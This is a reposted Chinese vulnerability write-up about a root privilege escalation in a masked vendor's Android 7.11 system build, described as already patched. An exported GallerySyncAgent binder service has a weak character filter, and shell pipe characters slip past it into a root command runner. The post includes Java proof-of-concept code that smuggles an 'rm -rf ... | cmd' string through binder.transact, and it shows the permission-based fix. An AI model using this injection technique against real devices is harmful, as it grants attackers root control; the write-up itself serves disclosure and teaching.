关注厂商系统安全,看我如何在某厂商 7.11上获取root权限(已经修复)

最新推荐文章于 2024-08-23 11:30:03 发布
最新推荐文章于 2024-08-23 11:30:03 发布
阅读量229 收藏
点赞数
文章标签: 移动开发 系统安全 shell
原文链接:https://yq.aliyun.com/articles/609423
版权

0x00 前言

国内手机厂商崛起,虽然用的是谷歌的android系统,但是大部分都会在框架层做很大的改动,他们的安全意识一般不够,因此系统漏洞非常多,一挖一大堆。某厂商在170721的时候发布了7.11的系统,那个时候导出了一个系统组件,系统校验不严格,导致我们可以提升到root权限并且执行任意代码,由于在170802版本的时候就已经修复了,也没什么价值了,所以我就把这个漏洞当例子,抛砖引玉。

0x01 漏洞起因(敏感词已经用xxxx代替)

组件导出

     <service android:exported="true" android:name="com.xxxxx.cloud.agent.gallery.GallerySyncAgent">
            <intent-filter>
                <action android:name="com.xxxxx.cloud.xxxxx_SYNC_MODULE"/>
                <category android:name="android.intent.category.default"/>
            </intent-filter>
        </service>

发现是个binder接口,可以通过AIDL远程调用里面的方法

onbind.png
class.png

createFolder里面特殊字符校验不严格,可以通过shell管道字符|绕过

比如,构造mkdir -p /data/local/tmp/mm | cmd 就可以绕过字符串过滤,并且在创建/data/local/tmp/mm的同时执行后面的cmd命令
createFolder.png

RUtils.RUtilsCmd执行的是root命令,宿主是一个系统服务,有严格的权限校验。

  1. 需要系统签名
  2. 需要权限声明: <uses-permission android:name="com.xxx.permission.RUTILCMD"/>
    rutils_checkpermission.png

0x02 漏洞利用

1、构造Intent bindService 到GallerySyncAgent 这个组件
2、通过shell 的| 字符,绕过命令校验,并且执行任意代码,构造字符串"/data/local/tmp/mm | rm -rf /data/local/tmp/mm | "+cmd 后面的cmd就是任意命令了

  
                boolean v2 = false;
                Parcel v0 = Parcel.obtain();
                Parcel v1 = Parcel.obtain();
                try {
                    v0.writeInterfaceToken("com.xxxx.cloud.agent.gallery.ISyncOcloud");
                    v0.writeString("/data/local/tmp/mm | rm -rf /data/local/tmp/mm | "+cmd);
                    binder.transact(15, v0, v1, 0);
                    v1.readException();
                    Log.e(TAG, "onServiceConnected: "+v1.readInt());
                    return v1.readInt() == 1 ?true : false;
                }
                catch(Throwable v3) {
                    v1.recycle();
                    v0.recycle();
                    throw v3;
                }

最后可以在uid=0(root) gid=0(root) groups=0(root) context=u:r:rutilsdaemon:s0这个进程里面执行任意命令

0x03 修复

加上了android:permission="xxxx.permission.xxxx_COMPONENT_SAFE 系统权限校验

      <service android:exported="true" android:name="com.xxxx.cloud.agent.gallery.GallerySyncAgent" android:permission="xxxx.permission.xxxx_COMPONENT_SAFE">
            <intent-filter>
                <action android:name="com.xxxx.cloud.xxxx_SYNC_MODULE"/>
                <category android:name="android.intent.category.default"/>
            </intent-filter>
        </service>

0x04 总结

这是一种非常经典的漏洞,在用AIDL设计跨进程通讯的时候,没有严格的校验,而且在过滤特殊字符的时候,没有严格过滤,最终一步步导致权限提升。

weixin_34376986
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
android 7.0 root工具,KingRoot全球率先实现Android 7.0一键 Root
weixin_33954023的博客
05-27 1152
前不久,期待已久的谷歌 Android 7.0/Nougat(牛轧糖)正式版系统终于发布,一大波手持Nexus设备的用户陆续享受到了“牛轧糖”的美味,跃跃欲试的发烧友们也纷纷摩拳擦掌想尝试一番Root Android 7.0 的快感。近日,向来以安全快捷备受认可的 Root 工具——KingRoot 公布,针对国内支持Android 7.0的Nexus 9(WIFI版)、Nexus 5X两款首发机...
android7.0 卡刷root,安卓类。Root教程,线刷卡刷 tc安卓7.0,手机必先Ro
weixin_35318685的博客
05-27 1594
该楼层疑似违规已被系统折叠隐藏此楼查看此楼安卓类。Root教程,线刷卡刷tc安卓7.0,手机必先Root才能操作。音标 [ruːt]。Root是android系统中 的超级管理员用户帐户,该帐户拥有整个系统至高无上的管理权限,系统中的所有对象他都可以操作。但是为了手机的安全性和稳定性,防止用户误操作导致系统溃,系统默认是没有开启root权限的, 这就需要我们来进行获取。取得root就是取得 an...
android7.1root工具,Android模拟器Root,Android7.1.1
weixin_42280315的博客
05-26 3252
网上看了各类博客,最后在实验的时候老是没有权限去写入su文件。android后面看了一个回答,终于搞定了Android7.1.1的Rootshell首先,须要准备的东西:app三、Android Studio 及 Android7.1.1的模拟器google四、配好的adb环境变量spa第一步:blog经过Android Studio打开模拟器,在模拟器中安装第一个软件。ip这个SuperSu...
android 7.11 官方下载,android11系统下载正式版|android11系统正式版-520下载站
weixin_35004618的博客
05-25 4065
android11系统正式版是一款今天刚刚发布的安卓系统正式版本,引发了不少用户的关注,android11系统正式版更加的注重用户的隐私安全,全方位的对你手机当中各种软件的权限进行管理,想下载的用户就来吧。android11系统正式版软件简介Android 11重要的操作系统。直接去最重要的东西。因为Android 11针对您的手机使用方式进行了优化。提供强大的设备控制。以及更简单的方法来管理对话...
Android应用程序获取ROOT权限的方法 (基础篇)
android大牛MrJing 活动中心
11-12 9796
要在android应用程序中使用root权限,那么运行程序的设备必须具有root权限   public static boolean runRootCommand(String command) {   Process process = null;   DataOutputStream os = null;   try {   process = Runtime.getRuntime().ex
Daemon线程--《Java并发编程的艺术》学习笔记
weixin_34204057的博客
10-16 69
2019独角兽企业重金招聘Python工程师标准>>> ...
宁志协会门户网站系统-宽屏 v7.11.9
11-27
《宁志协会门户网站系统-宽屏 v7.11.9》是一款专为全国各地方协会设计的自助建站解决方案,旨在简化建站流程,使非专业技术人员也能轻松搭建和管理自己的网站。这款系统以其安全、稳定、美观、实用和易操作的特性,...
宁志交警队网站管理系统-蓝色模板 v7.11.17
11-27
- 定期更新:鉴于系统版本号为v7.11.17,建议定期检查更新,以获取最新的功能和安全修复。 - 培训与教育:为确保所有使用者都能有效利用系统,应进行必要的操作培训。 - 用户反馈:收集用户对系统使用的意见和...
宁志部队网站管理系统+宽屏 v7.11.25
12-16
3. **安全性强**:作为专门为军区部队设计的系统,它必然重视数据安全和访问控制,可能包含多层权限设置和防黑客攻击机制,确保敏感信息的安全。 4. **定制化服务**:根据部队的特定需求,可能提供定制化的模块和...
宁志地方政府网站管理系统+新宽屏版 v7.11-17
11-27
宁志地方政府网站管理系统是一套专为地方政府建站首选的信息网站管理系统,大红色风格宽频页面十分大方。 宁志网站管理系统是国内知名建站软件,它由技术人员开发好了的一种现
宁志公安局网站管理系统+签收宽屏版 v7.11.25
11-27
宁志公安+签收网站管理系统一套专为公安机关派出所建站首选的信息网站管理系统,天蓝色风格宽频页面十分大方。 宁志网站管理系统主要为全国各地方政府、公安、事业单位、企业
kingroot android 7,KingRoot全球实现Android 7.0一键 Root
weixin_32666933的博客
05-28 328
前不久,期待已久的谷歌 Android 7.0/Nougat(牛轧糖)正式版系统终于发布,一大波手持Nexus设备的用户陆续享受到了“牛轧糖”的美味,跃跃欲试的发烧友们也纷纷摩拳擦掌想尝试一番Root Android 7.0 的快感。近日,向来以安全快捷备受认可的 Root 工具——KingRoot 公布,针对国内支持Android 7.0的Nexus 9(WIFI版)、Nexus 5X两款首发机...
android7.0root工具,KingRoot全球率先实现Android 7.0一键 Root
weixin_39981041的博客
05-25 219
KingRoot全球率先实现Android 7.0一键 Root2016年09月02日 10:36作者:广州分站文章出处:泡泡网原创分享前不久,期待已久的谷歌 Android 7.0/Nougat(牛轧糖)正式版系统终于发布,一大波手持Nexus设备的用户陆续享受到了“牛轧糖”的美味,跃跃欲试的发烧友们也纷纷摩拳擦掌想尝试一番Root Android 7.0 的快感。近日,向来以安全快捷备受认可的...
SafetyNet & 漏洞rootutils 利用
lei7143的专栏
10-18 1728
1、https://developers.google.com/android/guides/setup 添加SatetyNet 服务 2、https://developers.google.cn/android/reference/com/google/android/gms/safetynet/SafetyNet API 3、https://koz.io/inside-safe...
utils/sshcmd.sh
jason的笔记
12-27 536
#! /bin/bash #定义参数,后面parse调用这个脚本时添加的参数会用到. execcmd= machineip= loginuser= loginpassword= sshcmd_comm() { #获取位置参数,这里应该不用加双引号 cmd="$1" testip="$2" password="${3}" user="${4}" timeout=180 #判断$1 是
Qt:Qt背景
记录我们学习C语言,C++,数据结构,Linux操作系统,计算机组成原理
08-21 622
本文简单介绍了Qt的基础背景
Android Studio修改默认.m2与Gradle user home缓存位置
Zhang Phil
08-20 1210
当android studio新建一个项目时候,默认的.gradle路径均认为是在c盘的用户目录下,时间久了,c盘容量紧张。后续新建android studio项目的gradle加载文件会自动放在D:/program/android.gradle下。Android studio默认把.m2缓存放在C盘,时间久了,C盘空间不够,可配置Android studio.m2缓存路径在其他盘。android studio配置默认.gradle路径_android studio gradle在哪-CSDN博客。
Android 应用中广播权限未指定风险与解决方案
最新发布
weixin_37600397的博客
08-23 992
在Android应用中,广播(Broadcast)是一种重要的通信机制,应用可以通过广播与系统或其他应用进行通信。然而,如果在发送广播时未指定接收者的权限,可能会导致应用暴露于安全风险之下。未授权的接收者可能会拦截这些广播,甚至可能执行恶意操作。 在安全检查中,发现了一个问题:应用存在“Receiver权限未指定风险”。这个问题主要涉及广播发送时未指定接收者权限,可能导致广播被未授权的应用接收,进而可能造成数据泄露或其他安全问题。
Android笔试面试题AI答之Kotlin(20)
学无止境,止于至善
08-21 709
Elvis操作符(?:)是Kotlin(以及一些其他编程语言)中用于处理可空表达式的一种简洁方式。它允许在表达式的值为null时提供一个默认值,从而简化了空值的处理。在Kotlin中,构造函数(Constructor)是类的一个特殊方法,它用于初始化新创建的对象。与Java不同,Kotlin中的构造函数不是通过名称来定义的,而是与类名相同,并且没有返回类型(即使是void)。Kotlin支持主构造函数和次构造函数(也称为辅助构造函数或二级构造函数)。
VMware Horizon Client & Agent 7.11安全全面指南
《Horizon Client 和 Agent 安全指南》是一份针对VMware Horizon 7 7.11版本的详细文档,特别关注Horizon Client 3.x/4.x/5.x和View Agent 6.2.x/Horizon Agent 7.x的安全特性。这份指南旨在为IT决策者、架构师和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值